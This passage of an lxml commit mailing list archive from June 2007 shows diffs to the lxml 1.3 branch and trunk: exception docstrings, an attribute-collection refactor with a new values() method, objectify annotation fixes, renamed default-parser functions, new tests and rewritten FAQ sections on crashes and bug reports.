lxml/branch/lxml-1.3/src/lxml/dtd.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport dtdvalid class DTDError(LxmlError): + """Base class for DTD errors. + """ pass class DTDParseError(DTDError): + """Error while parsing a DTD. + """ pass class DTDValidateError(DTDError): + """Error while validating an XML document with a DTD. + """ pass ################################################################################ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 15 11:19:25 2007 @@ -85,6 +85,9 @@ # module level superclass for all exceptions class LxmlError(Error): + """Main exception base class for lxml. All other exceptions inherit from + this one. + """ def __init__(self, *args): _initError(self, *args) self.error_log = __copyGlobalErrorLog() @@ -106,15 +109,18 @@ # superclass for all syntax errors class LxmlSyntaxError(LxmlError, SyntaxError): - pass - -class DocumentInvalid(LxmlError): + """Base class for all syntax errors. + """ pass class XIncludeError(LxmlError): + """Error during XInclude processing. + """ pass class C14NError(LxmlError): + """Error during C14N serialisation. + """ pass # version information @@ -349,7 +355,7 @@ for prefix, href in nsmap.items(): href_utf = _utf8(href) c_href = _cstr(href_utf) - if prefix is not None: + if prefix is not None and prefix: prefix_utf = _utf8(prefix) c_prefix = _cstr(prefix_utf) else: @@ -747,8 +753,8 @@ return "" % (self.tag, id(self)) def __getitem__(self, Py_ssize_t index): - """Returns the given subelement. - """ + """Returns the subelement at the given position. + """ cdef xmlNode* c_node c_node = _findChild(self._c_node, index) if c_node is NULL: @@ -769,10 +775,10 @@ return [] c = start result = [] - doc = self._doc while c_node is not NULL and c < stop: if _isElement(c_node): - ret = python.PyList_Append(result, _elementFactory(doc, c_node)) + ret = python.PyList_Append( + result, _elementFactory(self._doc, c_node)) if ret: raise c = c + 1 @@ -888,29 +894,34 @@ return _getAttributeValue(self, key, default) def keys(self): - """Gets a list of attribute names. The names are returned in an arbitrary - order (just like for an ordinary Python dictionary). + """Gets a list of attribute names. The names are returned in an + arbitrary order (just like for an ordinary Python dictionary). + """ + return _collectAttributes(self._c_node, 1) + + def values(self): + """Gets element attribute values as a sequence of strings. The + attributes are returned in an arbitrary order. """ - return python.PySequence_List( _attributeIteratorFactory(self, 1) ) + return _collectAttributes(self._c_node, 2) def items(self): """Gets element attributes, as a sequence. The attributes are returned in an arbitrary order. """ - return python.PySequence_List( _attributeIteratorFactory(self, 3) ) + return _collectAttributes(self._c_node, 3) def getchildren(self): """Returns all subelements. The elements are returned in document order. """ cdef xmlNode* c_node - cdef _Document doc cdef int ret result = [] - doc = self._doc c_node = self._c_node.children while c_node is not NULL: if _isElement(c_node): - ret = python.PyList_Append(result, _elementFactory(doc, c_node)) + ret = python.PyList_Append( + result, _elementFactory(self._doc, c_node)) if ret: raise c_node = c_node.next @@ -1513,28 +1524,25 @@ return _getAttributeValue(self._element, key, default) def keys(self): - return python.PySequence_List( - _attributeIteratorFactory(self._element, 1) ) + return _collectAttributes(self._element._c_node, 1) def __iter__(self): - return iter(self.keys()) + return iter(_collectAttributes(self._element._c_node, 1)) def iterkeys(self): - return iter(self.keys()) + return iter(_collectAttributes(self._element._c_node, 1)) def values(self): - return python.PySequence_List( - _attributeIteratorFactory(self._element, 2) ) + return _collectAttributes(self._element._c_node, 2) def itervalues(self): - return iter(self.values()) + return iter(_collectAttributes(self._element._c_node, 2)) def items(self): - return python.PySequence_List( - _attributeIteratorFactory(self._element, 3) ) + return _collectAttributes(self._element._c_node, 3) def iteritems(self): - return iter(self.items()) + return iter(_collectAttributes(self._element._c_node, 3)) def has_key(self, key): if key in self: @@ -1977,12 +1985,18 @@ ################################################################################ # Validation +class DocumentInvalid(LxmlError): + """Validation error. Raised by all document validators when their + ``assertValid(tree)`` method fails. + """ + pass + cdef class _Validator: "Base class for XML validators." cdef _ErrorLog _error_log def __init__(self): self._error_log = _ErrorLog() - + def validate(self, etree): """Validate the document using this schema. Modified: lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd Fri Jun 15 11:19:25 2007 @@ -104,6 +104,9 @@ # attributes must not be removed during iteration! cdef object iterattributes(_Element element, int keysvalues) + # return the list of all attribute names (1), values (2) or items (3) + cdef object collectAttributes(tree.xmlNode* c_element, int keysvalues) + # set an attribute value on an element # on failure, sets an exception and returns -1 cdef int setAttributeValue(_Element element, key, value) except -1 Modified: lxml/branch/lxml-1.3/src/lxml/extensions.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/extensions.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/extensions.pxi Fri Jun 15 11:19:25 2007 @@ -1,6 +1,8 @@ -# supports for extension functions in XPath and XSLT +# support for extension functions in XPath and XSLT class XPathError(LxmlError): + """Base class of all XPath errors. + """ pass class XPathFunctionError(XPathError): @@ -207,11 +209,10 @@ return for o in obj: if isinstance(o, _Element): - element = <_Element>o #print "Holding element:", element._c_node - self._temp_refs.add(element) + self._temp_refs.add(o) #print "Holding document:", element._doc._c_doc - self._temp_refs.add(element._doc) + self._temp_refs.add((<_Element>o)._doc) def Extension(module, function_mapping, ns=None): @@ -405,7 +406,7 @@ fref = "{%s}%s" % (rctxt.functionURI, rctxt.function) else: fref = rctxt.function - xpath.xmlXPathErr(ctxt, xpath.XML_XPATH_UNKNOWN_FUNC_ERROR) + xpath.xmlXPathErr(ctxt, xpath.XPATH_UNKNOWN_FUNC_ERROR) exception = XPathFunctionError("XPath function '%s' not found" % fref) context._exc._store_exception(exception) Modified: lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi Fri Jun 15 11:19:25 2007 @@ -1,9 +1,13 @@ # module-level API for namespace implementations class LxmlRegistryError(LxmlError): + """Base class of lxml registry errors. + """ pass class NamespaceRegistryError(LxmlRegistryError): + """Error registering a namespace extension. + """ pass cdef object __NAMESPACE_REGISTRIES @@ -75,6 +79,11 @@ name = _utf8(name) return self._get(name) + def __delitem__(self, name): + if name is not None: + name = _utf8(name) + python.PyDict_DelItem(self._entries, name) + cdef object _get(self, object name): cdef python.PyObject* dict_result dict_result = python.PyDict_GetItem(self._entries, name) @@ -99,7 +108,7 @@ return self._entries.iteritems() def clear(self): - self._entries.clear() + python.PyDict_Clear(self._entries) cdef class _ClassNamespaceRegistry(_NamespaceRegistry): "Dictionary-like registry for namespace implementation classes" Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Fri Jun 15 11:19:25 2007 @@ -101,7 +101,12 @@ setPytypeAttributeTag() -# namespace for XML Schema instance +# namespaces for XML Schema +cdef object XML_SCHEMA_NS +XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" +cdef char* _XML_SCHEMA_NS +_XML_SCHEMA_NS = _cstr(XML_SCHEMA_NS) + cdef object XML_SCHEMA_INSTANCE_NS XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" cdef char* _XML_SCHEMA_INSTANCE_NS @@ -1449,7 +1454,7 @@ # StrType does not have a typecheck but is the default anyway, # so just accept it if given as type information if pytype is None: - return pytype + return None value = textOf(c_node) try: pytype.type_check(value) @@ -1459,7 +1464,6 @@ pass return None - def annotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'pytype' attributes. @@ -1483,52 +1487,53 @@ NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - pytype = None - value = None - if not ignore: - # check that old value is valid - old_value = cetree.attributeValueFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - if old_value is not None and old_value != TREE_PYTYPE: - dict_result = python.PyDict_GetItem(_PYTYPE_DICT, old_value) - if dict_result is not NULL: - pytype = dict_result - if pytype is not StrType: - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information - pytype = _check_type(c_node, pytype) - - if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: - # try to guess type - if cetree.findChildForwards(c_node, 0) is NULL: - # element has no children => data class - pytype = _guessPyType(textOf(c_node), StrType) - - if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNs(doc, c_node, _PYTYPE_NAMESPACE) - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + if c_node.type == tree.XML_ELEMENT_NODE: + pytype = None + value = None + if not ignore: + # check that old value is valid + old_value = cetree.attributeValueFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + if old_value is not None and old_value != TREE_PYTYPE: + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, old_value) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default + # anyway, so just accept it if given as type information + pytype = _check_type(c_node, pytype) + + if pytype is None: + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None: + # check for XML Schema type hint + value = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + + if value is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) + if dict_result is not NULL: + pytype = dict_result + + if pytype is None: + # try to guess type + if cetree.findChildForwards(c_node, 0) is NULL: + # element has no children => data class + pytype = _guessPyType(textOf(c_node), StrType) + + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNs(doc, c_node, _PYTYPE_NAMESPACE) + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) tree.END_FOR_EACH_ELEMENT_FROM(c_node) def deannotate(element_or_tree, pytype=True, xsi=True): @@ -1546,20 +1551,23 @@ c_node = element._c_node if pytype and xsi: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - cetree.delAttributeFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") tree.END_FOR_EACH_ELEMENT_FROM(c_node) elif pytype: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) tree.END_FOR_EACH_ELEMENT_FROM(c_node) else: tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) - cetree.delAttributeFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if c_node.type == tree.XML_ELEMENT_NODE: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") tree.END_FOR_EACH_ELEMENT_FROM(c_node) @@ -1570,10 +1578,13 @@ __DEFAULT_PARSER = etree.XMLParser(remove_blank_text=True) __DEFAULT_PARSER.setElementClassLookup( ObjectifyElementClassLookup() ) -cdef object parser -parser = __DEFAULT_PARSER +cdef object objectify_parser +objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. @@ -1581,16 +1592,16 @@ Call without arguments to reset to the original parser. """ - global parser + global objectify_parser if new_parser is None: - parser = __DEFAULT_PARSER + objectify_parser = __DEFAULT_PARSER elif isinstance(new_parser, etree.XMLParser): - parser = new_parser + objectify_parser = new_parser else: raise TypeError, "parser must inherit from lxml.etree.XMLParser" cdef _Element _makeElement(tag, text, attrib, nsmap): - return cetree.makeElement(tag, None, parser, text, None, attrib, nsmap) + return cetree.makeElement(tag, None, objectify_parser, text, None, attrib, nsmap) ################################################################################ # Module level factory functions @@ -1603,10 +1614,18 @@ NOTE: requires parser based element class lookup activated in lxml.etree! """ - return _fromstring(xml, parser) + return _fromstring(xml, objectify_parser) XML = fromstring +cdef object _parse +_parse = etree.parse + +def parse(f, parser=None): + if parser is None: + parser = objectify_parser + return _parse(f, parser) + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } @@ -1636,6 +1655,8 @@ if the type can be identified. If '_pytype' or '_xsi' are among the keyword arguments, they will be used instead. """ + if nsmap is None: + nsmap = _DEFAULT_NSMAP if attrib is not None: if python.PyDict_Size(_attributes): attrib.update(_attributes) Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Fri Jun 15 11:19:25 2007 @@ -5,9 +5,13 @@ from xmlparser cimport xmlParserCtxt, xmlDict class XMLSyntaxError(LxmlSyntaxError): + """Syntax error while parsing an XML document. + """ pass class ParserError(LxmlError): + """Internal lxml parser error. + """ pass ctypedef enum LxmlParserType: @@ -378,7 +382,7 @@ raise TypeError, "This class cannot be instantiated" self._parser_ctxt = pctxt if pctxt is NULL: - raise ParserError, "Failed to create parser context" + python.PyErr_NoMemory() if pctxt.sax != NULL: # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL @@ -425,9 +429,6 @@ def __get__(self): return self._error_log.copy() - def __dummy(self): - pass - def setElementClassLookup(self, ElementClassLookup lookup = None): """Set a lookup scheme for element classes generated from this parser. @@ -597,7 +598,7 @@ raise IOError, message elif ctxt.lastError.message is not NULL: message = (ctxt.lastError.message).strip() - if ctxt.lastError.line >= 0: + if ctxt.lastError.line > 0: message = "line %d: %s" % (ctxt.lastError.line, message) raise XMLSyntaxError, message else: @@ -746,7 +747,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser=None): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. If this function is called without a parser (or if it is @@ -760,16 +769,8 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." - return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser Modified: lxml/branch/lxml-1.3/src/lxml/public-api.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/public-api.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/public-api.pxi Fri Jun 15 11:19:25 2007 @@ -83,6 +83,9 @@ cdef public object iterattributes(_Element element, int keysvalues): return _attributeIteratorFactory(element, keysvalues) +cdef public object collectAttributes(xmlNode* c_element, int keysvalues): + return _collectAttributes(c_element, keysvalues) + cdef public int setAttributeValue(_Element element, key, value) except -1: return _setAttributeValue(element, key, value) Modified: lxml/branch/lxml-1.3/src/lxml/relaxng.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/relaxng.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/relaxng.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport relaxng class RelaxNGError(LxmlError): + """Base class for RelaxNG errors. + """ pass class RelaxNGParseError(RelaxNGError): + """Error while parsing an XML document as RelaxNG. + """ pass class RelaxNGValidateError(RelaxNGError): + """Error while validating an XML document with a RelaxNG schema. + """ pass ################################################################################ Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Fri Jun 15 11:19:25 2007 @@ -3,6 +3,8 @@ from etree import XML, Comment, ProcessingInstruction class SaxError(LxmlError): + """General SAX error. + """ pass def _getNsTag(tag): Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Fri Jun 15 11:19:25 2007 @@ -554,6 +554,15 @@ self.assertEquals('\n', self._writeElement(root)) + # ET's Elements have items() and key(), but not values() + def test_attribute_values(self): + XML = self.etree.XML + + root = XML('') + values = root.values() + values.sort() + self.assertEquals(['Alpha', 'Beta', 'Gamma'], values) + # gives error in ElementTree def test_comment_empty(self): Element = self.etree.Element @@ -1589,10 +1598,10 @@ suite.addTests([unittest.makeSuite(ElementIncludeTestCase)]) suite.addTests([unittest.makeSuite(ETreeC14NTestCase)]) suite.addTests( - [doctest.DocFileSuite('../../../doc/api.txt')]) - suite.addTests( [doctest.DocFileSuite('../../../doc/tutorial.txt')]) suite.addTests( + [doctest.DocFileSuite('../../../doc/api.txt')]) + suite.addTests( [doctest.DocFileSuite('../../../doc/parsing.txt')]) suite.addTests( [doctest.DocFileSuite('../../../doc/resolvers.txt')]) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Fri Jun 15 11:19:25 2007 @@ -13,6 +13,7 @@ from lxml import objectify +XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py Fri Jun 15 11:19:25 2007 @@ -34,6 +34,9 @@ def test_xslt_elementtree_error(self): self.assertRaises(ValueError, etree.XSLT, etree.ElementTree()) + def test_xslt_input_none(self): + self.assertRaises(TypeError, etree.XSLT, None) + def test_xslt_utf8(self): tree = self.parse(u'\uF8D2\uF8D2') style = self.parse('''\ Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Fri Jun 15 11:19:25 2007 @@ -5,8 +5,9 @@ # module level API functions def clearErrorLog(): - """Clear the global error log. - Note that this log is already bounded to a fixed size.""" + """Clear the global error log. Note that this log is already bound to a + fixed size. + """ __GLOBAL_ERROR_LOG.clear() # dummy function: no debug output at all @@ -148,6 +149,15 @@ def __len__(self): return len(self._entries) + def __contains__(self, error_type): + for entry in self._entries: + if entry.type == error_type: + return True + return False + + def __nonzero__(self): + return bool(self._entries) + def filter_domains(self, domains): """Filter the errors by the given domains and return a new error log containing the matches. Modified: lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi Fri Jun 15 11:19:25 2007 @@ -2,12 +2,18 @@ cimport xmlschema class XMLSchemaError(LxmlError): + """Base class of all XML Schema errors + """ pass class XMLSchemaParseError(XMLSchemaError): + """Error while parsing an XML document as XML Schema. + """ pass class XMLSchemaValidateError(XMLSchemaError): + """Error while validating an XML document with an XML Schema. + """ pass ################################################################################ From scoder at codespeak.net Fri Jun 15 11:26:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:26:56 +0200 (CEST) Subject: [Lxml-checkins] r44275 - in lxml/trunk: . doc src/lxml Message-ID: <20070615092656.F34288290@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:26:56 2007 New Revision: 44275 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/FAQ.txt lxml/trunk/src/lxml/objectify.pyx Log: some cleanups according to 1.3 branch Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 15 11:26:56 2007 @@ -63,8 +63,6 @@ * XSLT parsing failed to pass resolver context on to imported documents -* ``ETXPath`` was missing the ``regexp`` keyword argument - * passing '' as XPath namespace prefix did not raise an error * passing '' as namespace prefix in nsmap could be passed through to libxml2 Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Fri Jun 15 11:26:56 2007 @@ -27,7 +27,7 @@ 2.1 Why is lxml not written in Python? 2.2 How can I contribute? 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? + 3.1 My application crashes! 3.2 I think I have found a bug in lxml. What should I do? 4 Threading 4.1 Can I use threads to concurrently access the lxml API? @@ -277,45 +277,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes! +----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ - -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has a few good advices what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix. Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 15 11:26:56 2007 @@ -1694,6 +1694,9 @@ objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. From scoder at codespeak.net Fri Jun 15 11:47:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:47:50 +0200 (CEST) Subject: [Lxml-checkins] r44276 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070615094750.5094F8290@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:47:49 2007 New Revision: 44276 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: some more cleanup and small trunk merges Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 11:47:49 2007 @@ -14,9 +14,7 @@ adding processing instructions and comments around the root node * Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions - -* Element.attrib now has a ``pop()`` method + plus new ``deannotate()`` function * Support for custom Element class instantiation in lxml.sax: passing a ``makeelement()`` function to the ElementTreeContentHandler will reuse the @@ -40,7 +38,7 @@ * More ET compatible behaviour when writing out XML declarations or not -* ``Element.attrib`` was missing ``clear()`` method +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods * More robust error handling in ``iterparse()`` Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Fri Jun 15 11:47:49 2007 @@ -459,6 +459,8 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 if c_node.type != tree.XML_ELEMENT_NODE: # not an element, only succeed if we match everything return c_name is NULL and c_href is NULL @@ -609,9 +611,9 @@ c = s[0] if c & 0x80: is_non_ascii = 1 - if c == c'\0': + elif c == c'\0': return -1 # invalid! - if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): return -1 # invalid! s = s + 1 return is_non_ascii Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Fri Jun 15 11:47:49 2007 @@ -381,6 +381,16 @@ keys.sort() self.assertEquals(['alpha', 'beta', 'gamma'], keys) + def test_attribute_items2(self): + XML = self.etree.XML + + root = XML('') + items = root.items() + items.sort() + self.assertEquals( + [('alpha','Alpha'), ('beta','Beta'), ('gamma','Gamma')], + items) + def test_attribute_keys_ns(self): XML = self.etree.XML Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Fri Jun 15 11:47:49 2007 @@ -3,18 +3,28 @@ cimport xslt class XSLTError(LxmlError): + """Base class of all XSLT errors. + """ pass class XSLTParseError(XSLTError): + """Error parsing a stylesheet document. + """ pass class XSLTApplyError(XSLTError): + """Error running an XSL transformation. + """ pass class XSLTSaveError(XSLTError): + """Error serialising an XSLT result. + """ pass class XSLTExtensionError(XSLTError): + """Error registering an XSLT extension. + """ pass # version information From scoder at codespeak.net Fri Jun 15 11:49:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:49:22 +0200 (CEST) Subject: [Lxml-checkins] r44277 - 